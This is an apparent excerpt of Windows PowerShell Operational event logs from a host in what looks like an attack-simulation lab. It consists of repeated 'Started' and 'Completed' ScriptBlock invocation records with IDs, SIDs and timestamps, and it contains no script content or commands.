Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474074
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474073
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474072
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474071
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474070
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474068
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474067
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474066
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474065
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474064
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474063
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474062
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474061
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474060
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474059
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474058
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474057
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474056
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474055
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474054
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474053
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474052
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474051
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474050
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474049
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474048
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474046
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474045
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474044
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474043
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474042
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474041
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474040
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474039
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474038
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474037
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474036
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474035
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474034
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474032
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474031
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474030
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474029
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474028
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474027
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474026
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474025
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474024
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474023
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474022
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474021
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474020
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
